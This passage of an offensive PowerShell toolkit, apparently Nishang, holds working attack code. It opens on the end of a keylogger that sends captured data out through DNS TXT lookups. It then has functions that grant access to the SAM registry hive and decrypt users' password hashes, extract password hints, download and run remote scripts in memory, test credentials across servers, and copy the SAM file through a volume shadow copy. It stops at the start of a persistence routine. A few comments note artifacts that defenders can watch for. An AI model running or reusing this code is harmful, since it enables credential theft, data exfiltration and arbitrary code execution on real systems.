 # Channel 4: blob split into 63-char labels, each sent as a TXT lookup via an
 # nslookup child process against $AuthNS.
 elseif ($ExfilOption -eq "DNS")
 {
 $code = Compress-Encode
 $lengthofsubstr = 0
 $queries = [int]($code.Length/63)
 while ($queries -ne 0)
 {
 $querystring = $code.Substring($lengthofsubstr,63)
 Invoke-Expression "nslookup -querytype=txt $querystring.$DomaName $AuthNS"
 $lengthofsubstr += 63
 $queries -= 1
 }
 $mod = $code.Length%63
 $query = $code.Substring($code.Length - $mod, $mod)
 Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"

 }

 $check++
 # 5 s x 6000 iterations between kill-switch polls for this worker.
 if ($check -eq 6000)
 {
 $check = 0
 $webclient = New-Object System.Net.WebClient
 $filecontent = $webclient.DownloadString("$CheckURL")
 if ($filecontent -eq $MagicString)
 {
 break
 }
 }
 }
 }
}

 # Launch: with -exfil both workers run as separate jobs, otherwise only Keylog.
 # The jobs keep running after this function returns; Get-Job shows them.
 if ($exfil -eq $True)
 {
 start-job -InitializationScript $functions -scriptblock {Keypaste $args[0] $args[1] $args[2] $args[3] $args[4] $args[5] $args[6] $args[7]} -ArgumentList @($ExfilOption,$dev_key,$username,$password,$URL,$AuthNS,$MagicString,$CheckURL)
 start-job -InitializationScript $functions -scriptblock {Keylog $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL)
 }
 else
 {
 start-job -InitializationScript $functions -scriptblock {Keylog $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL)
 }
}
2665
2666
2667##########################################################Dump windows password hashes######################################
2668###Thanks David Kennedy###
2669###powerdump.rb from msf
function Get-PassHashes {
<#
.SYNOPSIS
Nishang payload which dumps password hashes.

.DESCRIPTION
The payload dumps password hashes using the modified powerdump script from MSF. Administrator privileges are required for this script
(but not SYSTEM privs as for the original powerdump)

How it gets at the data (all visible below): it adds a FullControl access rule for the current user on
HKLM\SAM\SAM\Domains, reads the boot key from the class strings of four keys under
SYSTEM\CurrentControlSet\Control\Lsa, derives the hashed boot key from the Account "F" value, decrypts each
user's "V" blob, prints pwdump-style "user:rid:lm:nt:::" lines, then removes the access rule again.
For defenders the registry ACL change on the SAM hive and the read of HKLM\SAM\SAM\Domains\Account\Users by a
non-SYSTEM process are the artifacts to monitor.

.EXAMPLE
PS > Get-PassHashes

.LINK
http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html?showComment=1386725874167#c8513980725823764060
https://github.com/samratashok/nishang

#>
[CmdletBinding()]
Param ()


#######################################powerdump written by David Kennedy#########################################
# Compiles the PowerDump.Native P/Invoke class and the Shift helper once per
# process. The compile is skipped if [PowerDump.Native] already resolves.
function LoadApi
{
 $oldErrorAction = $global:ErrorActionPreference;
 $global:ErrorActionPreference = "SilentlyContinue";
 $test = [PowerDump.Native];
 $global:ErrorActionPreference = $oldErrorAction;
 if ($test)
 {
 # already loaded
 return;
 }

$code = @'
using System;
using System.Security.Cryptography;
using System.Runtime.InteropServices;
using System.Text;

namespace PowerDump
{
 public class Native
 {
 [DllImport("advapi32.dll", CharSet = CharSet.Auto)]
 public static extern int RegOpenKeyEx(
 int hKey,
 string subKey,
 int ulOptions,
 int samDesired,
 out int hkResult);

 [DllImport("advapi32.dll", EntryPoint = "RegEnumKeyEx")]
 extern public static int RegEnumKeyEx(
 int hkey,
 int index,
 StringBuilder lpName,
 ref int lpcbName,
 int reserved,
 StringBuilder lpClass,
 ref int lpcbClass,
 out long lpftLastWriteTime);

 [DllImport("advapi32.dll", EntryPoint="RegQueryInfoKey", CallingConvention=CallingConvention.Winapi, SetLastError=true)]
 extern public static int RegQueryInfoKey(
 int hkey,
 StringBuilder lpClass,
 ref int lpcbClass,
 int lpReserved,
 out int lpcSubKeys,
 out int lpcbMaxSubKeyLen,
 out int lpcbMaxClassLen,
 out int lpcValues,
 out int lpcbMaxValueNameLen,
 out int lpcbMaxValueLen,
 out int lpcbSecurityDescriptor,
 IntPtr lpftLastWriteTime);

 [DllImport("advapi32.dll", SetLastError=true)]
 public static extern int RegCloseKey(
 int hKey);

 }
 } // end namespace PowerDump

 public class Shift {
 public static int Right(int x, int count) { return x >> count; }
 public static uint Right(uint x, int count) { return x >> count; }
 public static long Right(long x, int count) { return x >> count; }
 public static ulong Right(ulong x, int count) { return x >> count; }
 public static int Left(int x, int count) { return x << count; }
 public static uint Left(uint x, int count) { return x << count; }
 public static long Left(long x, int count) { return x << count; }
 public static ulong Left(ulong x, int count) { return x << count; }
 }
'@

 # In-memory CodeDom compile; on .NET Framework this typically launches a
 # csc.exe child process, which is a process-creation artifact worth noting.
 $provider = New-Object Microsoft.CSharp.CSharpCodeProvider
 $dllName = [PsObject].Assembly.Location
 $compilerParameters = New-Object System.CodeDom.Compiler.CompilerParameters
 $assemblies = @("System.dll", $dllName)
 $compilerParameters.ReferencedAssemblies.AddRange($assemblies)
 $compilerParameters.GenerateInMemory = $true
 $compilerResults = $provider.CompileAssemblyFromSource($compilerParameters, $code)
 if($compilerResults.Errors.Count -gt 0) {
 $compilerResults.Errors | % { Write-Error ("{0}:`t{1}" -f $_.Line,$_.ErrorText) }
 }

}

# Constant salts mixed into the per-user RC4 key (NUL-terminated ASCII).
$antpassword = [Text.Encoding]::ASCII.GetBytes("NTPASSWORD`0");
$almpassword = [Text.Encoding]::ASCII.GetBytes("LMPASSWORD`0");
# Values emitted when a user has no LM / no NT hash stored.
$empty_lm = [byte[]]@(0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee);
$empty_nt = [byte[]]@(0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89,0xc0);
# DES odd-parity lookup table, indexed by the 7-bit key byte shifted left by one.
$odd_parity = @(
 1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
 112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
 128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
 145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
 161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
 176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
 193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
 208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
 224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
 241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
);

# Builds the two 7-byte strings from the little-endian RID (bytes repeated
# in two rotations) and turns each into an 8-byte DES key via str_to_key.
function sid_to_key($sid)
{
 $s1 = @();
 $s1 += [char]($sid -band 0xFF);
 $s1 += [char]([Shift]::Right($sid,8) -band 0xFF);
 $s1 += [char]([Shift]::Right($sid,16) -band 0xFF);
 $s1 += [char]([Shift]::Right($sid,24) -band 0xFF);
 $s1 += $s1[0];
 $s1 += $s1[1];
 $s1 += $s1[2];
 $s2 = @();
 $s2 += $s1[3]; $s2 += $s1[0]; $s2 += $s1[1]; $s2 += $s1[2];
 $s2 += $s2[0]; $s2 += $s2[1]; $s2 += $s2[2];
 # Leading comma keeps the pair of arrays from being unrolled by the pipeline.
 return ,((str_to_key $s1),(str_to_key $s2));
}

# Spreads 7 input bytes over 8 key bytes (7 bits each) and applies the
# odd-parity table to every byte.
function str_to_key($s)
{
 $key = @();
 $key += [Shift]::Right([int]($s[0]), 1 );
 $key += [Shift]::Left( $([int]($s[0]) -band 0x01), 6) -bor [Shift]::Right([int]($s[1]),2);
 $key += [Shift]::Left( $([int]($s[1]) -band 0x03), 5) -bor [Shift]::Right([int]($s[2]),3);
 $key += [Shift]::Left( $([int]($s[2]) -band 0x07), 4) -bor [Shift]::Right([int]($s[3]),4);
 $key += [Shift]::Left( $([int]($s[3]) -band 0x0F), 3) -bor [Shift]::Right([int]($s[4]),5);
 $key += [Shift]::Left( $([int]($s[4]) -band 0x1F), 2) -bor [Shift]::Right([int]($s[5]),6);
 $key += [Shift]::Left( $([int]($s[5]) -band 0x3F), 1) -bor [Shift]::Right([int]($s[6]),7);
 $key += $([int]($s[6]) -band 0x7F);
 0..7 | %{
 $key[$_] = [Shift]::Left($key[$_], 1);
 $key[$_] = $odd_parity[$key[$_]];
 }
 return ,$key;
}

# Minimal RC4 object: "init" runs the key schedule into S (once), "encrypt"
# XORs the argument against the keystream from a copy of S.
function NewRC4([byte[]]$key)
{
 return new-object Object |
 Add-Member NoteProperty key $key -PassThru |
 Add-Member NoteProperty S $null -PassThru |
 Add-Member ScriptMethod init {
 if (-not $this.S)
 {
 [byte[]]$this.S = 0..255;
 0..255 | % -begin{[long]$j=0;}{
 $j = ($j + $this.key[$($_ % $this.key.Length)] + $this.S[$_]) % $this.S.Length;
 $temp = $this.S[$_]; $this.S[$_] = $this.S[$j]; $this.S[$j] = $temp;
 }
 }
 } -PassThru |
 Add-Member ScriptMethod "encrypt" {
 $data = $args[0];
 $this.init();
 $outbuf = new-object byte[] $($data.Length);
 # Work on a copy so the object can encrypt more than once with the same state.
 $S2 = $this.S[0..$this.S.Length];
 0..$($data.Length-1) | % -begin{$i=0;$j=0;} {
 $i = ($i+1) % $S2.Length;
 $j = ($j + $S2[$i]) % $S2.Length;
 $temp = $S2[$i];$S2[$i] = $S2[$j];$S2[$j] = $temp;
 $a = $data[$_];
 $b = $S2[ $($S2[$i]+$S2[$j]) % $S2.Length ];
 $outbuf[$_] = ($a -bxor $b);
 }
 return ,$outbuf;
 } -PassThru
}

function des_encrypt([byte[]]$data, [byte[]]$key)
{
 return ,(des_transform $data $key $true)
}

function des_decrypt([byte[]]$data, [byte[]]$key)
{
 return ,(des_transform $data $key $false)
}

# Single-block DES, ECB, no padding. The IV assignment is irrelevant in ECB
# mode but must be a valid 8-byte value, hence $key is reused.
function des_transform([byte[]]$data, [byte[]]$key, $doEncrypt)
{
 $des = new-object Security.Cryptography.DESCryptoServiceProvider;
 $des.Mode = [Security.Cryptography.CipherMode]::ECB;
 $des.Padding = [Security.Cryptography.PaddingMode]::None;
 $des.Key = $key;
 $des.IV = $key;
 $transform = $null;
 if ($doEncrypt) {$transform = $des.CreateEncryptor();}
 else{$transform = $des.CreateDecryptor();}
 $result = $transform.TransformFinalBlock($data, 0, $data.Length);
 return ,$result;
}

# Returns the *class* string of a registry key (not a value) via
# RegQueryInfoKey; the class string is not exposed by the PowerShell
# registry provider, which is why raw advapi32 calls are used here.
function Get-RegKeyClass([string]$key, [string]$subkey)
{
 switch ($Key) {
 "HKCR" { $nKey = 0x80000000} #HK Classes Root
 "HKCU" { $nKey = 0x80000001} #HK Current User
 "HKLM" { $nKey = 0x80000002} #HK Local Machine
 "HKU" { $nKey = 0x80000003} #HK Users
 "HKCC" { $nKey = 0x80000005} #HK Current Config
 default {
 throw "Invalid Key. Use one of the following options HKCR, HKCU, HKLM, HKU, HKCC"
 }
 }
 # Only $KEYREAD is used; the other two constants are unused.
 $KEYQUERYVALUE = 0x1;
 $KEYREAD = 0x19;
 $KEYALLACCESS = 0x3F;
 $result = "";
 [int]$hkey=0
 # Win32 registry APIs return 0 (ERROR_SUCCESS) on success, hence the "-not".
 if (-not [PowerDump.Native]::RegOpenKeyEx($nkey,$subkey,0,$KEYREAD,[ref]$hkey))
 {
 $classVal = New-Object Text.Stringbuilder 1024
 [int]$len = 1024
 if (-not [PowerDump.Native]::RegQueryInfoKey($hkey,$classVal,[ref]$len,0,[ref]$null,[ref]$null,
 [ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,0))
 {
 $result = $classVal.ToString()
 }
 else
 {
 Write-Error "RegQueryInfoKey failed";
 }
 [PowerDump.Native]::RegCloseKey($hkey) | Out-Null
 }
 else
 {
 Write-Error "Cannot open key";
 }
 return $result;
}

# Boot key: concatenated class strings of JD, Skew1, GBG, Data (hex text),
# converted to 16 bytes and permuted by the fixed index table.
function Get-BootKey
{
 $s = [string]::Join("",$("JD","Skew1","GBG","Data" | %{Get-RegKeyClass "HKLM" "SYSTEM\CurrentControlSet\Control\Lsa\$_"}));
 $b = new-object byte[] $($s.Length/2);
 0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)}
 $b2 = new-object byte[] 16;
 0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 | % -begin{$i=0;}{$b2[$i]=$b[$_];$i++}
 return ,$b2;
}

# Hashed boot key: MD5 over F[0x70..0x7F] + fixed salts + bootkey, used as an
# RC4 key to decrypt F[0x80..0x9F]. Needs read access to SAM\SAM\Domains\Account,
# which only works after the ACL change made in the function body below.
function Get-HBootKey
{
 param([byte[]]$bootkey);
 $aqwerty = [Text.Encoding]::ASCII.GetBytes("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%`0");
 $anum = [Text.Encoding]::ASCII.GetBytes("0123456789012345678901234567890123456789`0");
 $k = Get-Item HKLM:\SAM\SAM\Domains\Account;
 if (-not $k) {return $null}
 [byte[]]$F = $k.GetValue("F");
 if (-not $F) {return $null}
 $rc4key = [Security.Cryptography.MD5]::Create().ComputeHash($F[0x70..0x7F] + $aqwerty + $bootkey + $anum);
 $rc4 = NewRC4 $rc4key;
 return ,($rc4.encrypt($F[0x80..0x9F]));
}

# Username is UTF-16 at (offset stored at V[0x0c]) + 0xCC, length at V[0x10].
function Get-UserName([byte[]]$V)
{
 if (-not $V) {return $null};
 $offset = [BitConverter]::ToInt32($V[0x0c..0x0f],0) + 0xCC;
 $len = [BitConverter]::ToInt32($V[0x10..0x13],0);
 return [Text.Encoding]::Unicode.GetString($V, $offset, $len);
}

# $u is an item from Get-UserKeys (has .V, .HashOffset, .Rid). Picks the
# encrypted LM/NT blobs out of V by the length fields, then decrypts them.
function Get-UserHashes($u, [byte[]]$hbootkey)
{
 [byte[]]$enc_lm_hash = $null; [byte[]]$enc_nt_hash = $null;

 # check if hashes exist (if byte memory equals to 20, then we've got a hash)
 $LM_exists = $false;
 $NT_exists = $false;
 # LM header check
 # NOTE(review): "-eq 20" on a 4-element array filters the array rather than
 # comparing a number, so the condition is true if any of the four bytes is 20.
 if ($u.V[0xa0..0xa3] -eq 20)
 {
 $LM_exists = $true;
 }
 # NT header check
 elseif ($u.V[0xac..0xaf] -eq 20)
 {
 $NT_exists = $true;
 }

 if ($LM_exists -eq $true)
 {
 $lm_hash_offset = $u.HashOffset + 4;
 $nt_hash_offset = $u.HashOffset + 8 + 0x10;
 $enc_lm_hash = $u.V[$($lm_hash_offset)..$($lm_hash_offset+0x0f)];
 $enc_nt_hash = $u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
 }

 elseif ($NT_exists -eq $true)
 {
 $nt_hash_offset = $u.HashOffset + 8;
 $enc_nt_hash = [byte[]]$u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
 }
 return ,(DecryptHashes $u.Rid $enc_lm_hash $enc_nt_hash $hbootkey);
}

# Returns (lm, nt); a missing blob is replaced by the corresponding "empty" constant.
function DecryptHashes($rid, [byte[]]$enc_lm_hash, [byte[]]$enc_nt_hash, [byte[]]$hbootkey)
{
 [byte[]]$lmhash = $empty_lm; [byte[]]$nthash=$empty_nt;
 # LM Hash
 if ($enc_lm_hash)
 {
 $lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;
 }

 # NT Hash
 if ($enc_nt_hash)
 {
 $nthash = DecryptSingleHash $rid $hbootkey $enc_nt_hash $antpassword;
 }

 return ,($lmhash,$nthash)
}

# Two-layer unwrap: RC4 with MD5(hbootkey[0..15] + RID + salt), then the two
# 8-byte halves through DES with the RID-derived keys from sid_to_key.
function DecryptSingleHash($rid,[byte[]]$hbootkey,[byte[]]$enc_hash,[byte[]]$lmntstr)
{
 $deskeys = sid_to_key $rid;
 $md5 = [Security.Cryptography.MD5]::Create();
 $rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);
 $rc4 = NewRC4 $rc4_key;
 $obfkey = $rc4.encrypt($enc_hash);
 $hash = (des_decrypt $obfkey[0..7] $deskeys[0]) +
 (des_decrypt $obfkey[8..$($obfkey.Length - 1)] $deskeys[1]);
 return ,$hash;
}

# Enumerates the 8-hex-digit user keys under SAM\SAM\Domains\Account\Users and
# decorates each with Rid, V, UserName and HashOffset script properties.
function Get-UserKeys
{
 ls HKLM:\SAM\SAM\Domains\Account\Users |
 where {$_.PSChildName -match "^[0-9A-Fa-f]{8}$"} |
 Add-Member AliasProperty KeyName PSChildName -PassThru |
 Add-Member ScriptProperty Rid {[Convert]::ToInt32($this.PSChildName, 16)} -PassThru |
 Add-Member ScriptProperty V {[byte[]]($this.GetValue("V"))} -PassThru |
 Add-Member ScriptProperty UserName {Get-UserName($this.GetValue("V"))} -PassThru |
 Add-Member ScriptProperty HashOffset {[BitConverter]::ToUInt32($this.GetValue("V")[0x9c..0x9f],0) + 0xCC} -PassThru
}

# Driver: emits one "user:rid:lmhex:nthex:::" line per account.
function DumpHashes
{
 LoadApi
 $bootkey = Get-BootKey;
 $hbootKey = Get-HBootKey $bootkey;
 Get-UserKeys | %{
 $hashes = Get-UserHashes $_ $hBootKey;
 "{0}:{1}:{2}:{3}:::" -f ($_.UserName,$_.Rid,
 [BitConverter]::ToString($hashes[0]).Replace("-","").ToLower(),
 [BitConverter]::ToString($hashes[1]).Replace("-","").ToLower());
 }
}

 #http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html?showComment=1386725874167#c8513980725823764060
 # Elevation check: without the Administrator role nothing below runs.
 if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
 {
 Write-Warning "Script requires elevated or administrative privileges."
 Return
 }
 else
 {
 #Set permissions for the current user.
 # Grants the current user FullControl (inherited by subkeys) on
 # HKLM\SAM\SAM\Domains. This ACL modification on the SAM hive is the
 # loudest artifact of the whole function and is what object-access /
 # permission-change auditing on that key would record.
 $rule = New-Object System.Security.AccessControl.RegistryAccessRule (
 [System.Security.Principal.WindowsIdentity]::GetCurrent().Name,
 "FullControl",
 [System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit",
 [System.Security.AccessControl.PropagationFlags]"None",
 [System.Security.AccessControl.AccessControlType]"Allow")
 $key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
 "SAM\SAM\Domains",
 [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
 [System.Security.AccessControl.RegistryRights]::ChangePermissions)
 $acl = $key.GetAccessControl()
 $acl.SetAccessRule($rule)
 $key.SetAccessControl($acl)

 DumpHashes

 #Remove the permissions added above.
 # Best-effort revert: every ACE whose identity is the current user is dropped,
 # so a pre-existing ACE for the same user (if any) is removed as well. If
 # DumpHashes throws, this revert is skipped and the grant remains.
 $user = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
 $acl.Access | where {$_.IdentityReference.Value -eq $user} | %{$acl.RemoveAccessRule($_)} | Out-Null
 Set-Acl HKLM:\SAM\SAM\Domains $acl

 }
}
3084
3085
3086########################################Extract password hints of Windows Users######################################################
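function Get-PassHints {
<#
.SYNOPSIS
Nishang script which extracts password hint for users in clear text.

.DESCRIPTION
The script extracts password hints from the SAM registry hive. It needs elevated Administrator privileges:
it temporarily grants the current user FullControl on HKLM:\SAM\SAM\Domains, reads the UserPasswordHint value
of every user key under Account\Users, and removes the ACL entry it added again (also when an error occurs).

.EXAMPLE
PS > Get-PassHints

.OUTPUTS
One line per user that has a hint, in the form username:hint.

.LINK
http://www.labofapenetrationtester.com/2015/09/extracting-windows-users-password-hints.html
https://github.com/samratashok/nishang
#>

    #From powerdump from SET
    # The user name lives in the V blob: its offset (relative to the 0xCC fixed header) is the int32
    # at V[0x0c..0x0f] and its byte length the int32 at V[0x10..0x13]; the string itself is UTF-16LE.
    function Get-UserName([byte[]]$V)
    {
        if (-not $V) {return $null};
        $offset = [BitConverter]::ToInt32($V[0x0c..0x0f],0) + 0xCC;
        $len = [BitConverter]::ToInt32($V[0x10..0x13],0);
        return [Text.Encoding]::Unicode.GetString($V, $offset, $len);
    }

    $currentIdentity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    if (-not ([Security.Principal.WindowsPrincipal]$currentIdentity).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))
    {
        # OpenSubKey with ChangePermissions would throw anyway; fail with a clear message instead.
        Write-Warning "Script requires elevated or administrative privileges."
        return
    }

    #Set permissions to allow Access to SAM\SAM\Domains registry hive.
    #http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html?showComment=1386725874167#c8513980725823764060
    $rule = New-Object System.Security.AccessControl.RegistryAccessRule (
        $currentIdentity.Name,
        "FullControl",
        [System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit",
        [System.Security.AccessControl.PropagationFlags]"None",
        [System.Security.AccessControl.AccessControlType]"Allow")
    $domainsKey = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
        "SAM\SAM\Domains",
        [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
        [System.Security.AccessControl.RegistryRights]::ChangePermissions)
    $acl = $domainsKey.GetAccessControl()
    $acl.SetAccessRule($rule)
    $domainsKey.SetAccessControl($acl)

    try
    {
        #Logic for extracting password hint
        # (the loop variable no longer shadows the registry key handle opened above)
        foreach ($userKey in (Get-ChildItem HKLM:\SAM\SAM\Domains\Account\Users\))
        {
            $props = Get-ItemProperty $userKey.PSPath
            #Check for users who have passwordhint
            if ($props.UserPasswordHint)
            {
                $username = Get-UserName($props.V)
                $passhint = ([text.encoding]::Unicode).GetString($props.UserPasswordHint)
                Write-Output "$username`:$passhint"
            }
        }
    }
    finally
    {
        #Remove the permissions added above - also on error, so the FullControl ACE never outlives the call.
        $user = $currentIdentity.Name
        $acl.Access | where {$_.IdentityReference.Value -eq $user} | %{$acl.RemoveAccessRule($_)} | Out-Null
        Set-Acl HKLM:\SAM\SAM\Domains $acl
        $domainsKey.Close()
    }
}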
3156
3157
3158####################################Download and Execute a powershell script#########################################################
3159
3160
3161
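function Download-Execute-PS
{
<#
.SYNOPSIS
Nishang script which downloads and executes a powershell script.

.DESCRIPTION
This payload downloads a powershell script from the specified URL and then executes it on the target, either
from a file in the user's temp directory or (with -nodownload) directly in memory via Invoke-Expression.
Whatever the URL serves is executed with the caller's privileges and without any integrity check, so fetch only
from a host you control, preferably over HTTPS.

.PARAMETER ScriptURL
The URL from where the powershell script would be downloaded.

.PARAMETER Arguments
The Arguments to pass to the script when it is not downloaded to disk i.e. with the -nodownload switch.
This is to be used when the scripts load a function in memory, true for most scripts in Nishang.

.PARAMETER Nodownload
If this switch is used, the script is not downloaded to the disk.

.EXAMPLE
PS > Download-Execute-PS http://pastebin.com/raw.php?i=jqP2vJ3x

.EXAMPLE
PS > Download-Execute-PS http://script.alteredsecurity.com/evilscript.ps1 -Argument evilscript -nodownload
The above command does not download the script file to disk and executes the evilscript function inside the evilscript.ps1

.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>
    [CmdletBinding()] Param(
        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $ScriptURL,

        [Parameter(Position = 1, Mandatory = $False)]
        [String]
        $Arguments,

        [Switch]
        $nodownload
    )

    $webclient = New-Object System.Net.WebClient

    if ($nodownload)
    {
        # In-memory execution: the script text goes straight to Invoke-Expression and never touches disk.
        Invoke-Expression ($webclient.DownloadString("$ScriptURL"))
        if ($Arguments)
        {
            # Typically the name of a function the script just defined, plus its arguments.
            Invoke-Expression $Arguments
        }
    }
    else
    {
        $file1 = "$env:temp\deps.ps1"
        $webclient.DownloadFile($ScriptURL, "$file1")
        # -File instead of -command: with -command a TEMP path containing a space was re-parsed
        # as several tokens and the script never ran. -NoProfile keeps the user's profile out of it.
        $script:pastevalue = powershell.exe -ExecutionPolicy Bypass -NoLogo -NoProfile -File "$file1"
        $pastevalue
    }
}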
3223
3224
3225
3226#####################################Check credentials on remote computers and create sessions#########################################################
3227
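function Create-MultipleSessions
{

<#
.SYNOPSIS
Function which can check for credentials on remote computers and can open PSSessions if the credentials work.

.DESCRIPTION
The payload uses WMI to check a credential against the given list of computers. Use the -Creds parameter to be prompted
for username and password. If the script is run from a powershell session with local or domain admin credentials (or from
a powershell session started with hashes of such an account using WCE), it should be used without the -Creds parameter.
Use the -CreateSessions parameter to create PSSessions. Note that the WMI check uses DCOM/RPC while PSSessions use WinRM,
so a host on which the credentials work may still refuse the session.

.PARAMETER filename
Path to the file which stores the list of servers, one per line. Blank lines are ignored.

.PARAMETER Creds
Use this parameter to be prompted for username (in the form domain\username) and password.

.PARAMETER CreateSessions
Use this parameter to make the script create PSSessions to targets on which the credentials worked.

.PARAMETER VerboseErrors
Use this parameter to get verbose error messages.

.EXAMPLE
PS > Create-MultipleSessions -filename .\servers.txt
Above command uses the credentials available with the current powershell session and checks them against the computers specified in servers.txt

.EXAMPLE
PS > Create-MultipleSessions -filename .\servers.txt -Creds
Above command asks the user to provide username and password to check on remote computers.

.EXAMPLE
PS > Create-MultipleSessions -filename .\servers.txt -CreateSessions
Above command uses the credentials available with the current powershell session, checks them against the computers specified in servers.txt and creates a PSSession for each that accepted them.

.LINK
http://labofapenetrationtester.com/2013/04/poshing-the-hashes.html
https://github.com/samratashok/nishang
#>

    [CmdletBinding()] Param (
        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $filename,

        [Parameter(Mandatory = $False)]
        [Switch]
        $Creds,

        [Parameter(Mandatory = $False)]
        [Switch]
        $CreateSessions,

        [Parameter(Mandatory = $False)]
        [Switch]
        $VerboseErrors
    )
    # Assigning the preference here creates a function-local copy; the caller's setting is untouched.
    $ErrorActionPreference = "SilentlyContinue"
    if ($VerboseErrors)
    {
        $ErrorActionPreference = "Continue"
    }
    $servers = Get-Content $filename | Where-Object { $_ -and $_.Trim() }

    # Parameters are splatted instead of building command strings for Invoke-Expression,
    # so nothing read from the servers file is ever re-parsed as PowerShell code.
    $checkArgs = @{ Query = "Select IPAddress From Win32_NetworkAdapterConfiguration Where IPEnabled = True" }
    $sessionArgs = @{}
    if ($Creds)
    {
        $Credentials = Get-Credential
        $checkArgs.Credential = $Credentials
        $sessionArgs.Credential = $Credentials
    }

    foreach ($server in $servers)
    {
        $check = Get-WmiObject @checkArgs -ComputerName $server
        if ($null -ne $check)
        {
            Write-Host "Credentials worked on $server !!" -ForegroundColor Green
            if ($CreateSessions)
            {
                "`nCreating Session for $server"
                New-PSSession @sessionArgs -ComputerName $server
            }
        }
        else
        {
            "Could not connect or credentials didn't work on $server"
        }
    }

    if ($CreateSessions)
    {
        # Get-PSSession lists every session of this runspace, including any that existed before this call.
        Write-Host "`nFollowing Sessions have been created: " -ForegroundColor Green
        Get-PSSession
    }
}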
3330
3331##########################################Copy SAM file using Volume Shadow Service################################
3332<#
3333.SYNOPSIS
3334Nishang Payload which copies the SAM file.
3335
3336.DESCRIPTION
3337This payload uses the VSS service (starts it if not running), creates a shadow of C:
3338and copies the SAM file which could be used to dump password hashes from it. This must be run from an elevated shell.
3339
3340.PARAMETER PATH
3341The path where SAM file would be saved. The folder must exist already.
3342
3343.EXAMPLE
3344PS > Copy-VSS
3345Saves the SAM file in current run location of the payload.
3346
3347.Example
3348PS > Copy-VSS -path C:\temp
3349
3350.LINK
3351http://www.canhazcode.com/index.php?a=4
3352https://github.com/samratashok/nishang
3353
3354.NOTES
3355Code by @al14s
3356
3357#>
3358
3359
3360function Copy-VSS
3361{
3362 [CmdletBinding()] Param(
3363 [Parameter(Position = 0, Mandatory = $False)]
3364 [String]
3365 $Path
3366 )
3367 $service = (Get-Service -name VSS)
3368 if($service.Status -ne "Running")
3369 {
3370 $notrunning=1
3371 $service.Start()
3372 }
3373 $id = (gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
3374 $volume = (gwmi win32_shadowcopy -filter "ID='$id'")
3375 $filepath = "$pwd\SAM"
3376 if ($path)
3377 {
3378 $filepath = "$path\SAM"
3379 }
3380
3381 `cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SAM" $filepath`
3382 $volume.Delete()
3383 if($notrunning -eq 1)
3384 {
3385 $service.Stop()
3386 }
3387}
3388
3389
3390
3391########################################################Achieve persistence ###############################################
3392###http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/20/use-powershell-to-create-a-permanent-wmi-event-to-launch-a-vbscript.aspx
3393
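function Persistence
{
<#
.SYNOPSIS
Function which could be used to add reboot persistence to powerpreter.

.DESCRIPTION
Powerpreter is dropped into the user's temp directory (with name Update.psm1) and either a WMI permanent event consumer
(elevated) or an HKCU Run value (unprivileged) is used for persistence. A launcher update.vbs and a stager update.ps1 are
written to the temp directory; the stager re-downloads Update.psm1 from PowerpreterURL if it has been removed, copies it
to $home\Documents\WindowsPowerShell\Modules\Update, and then polls CheckURL.
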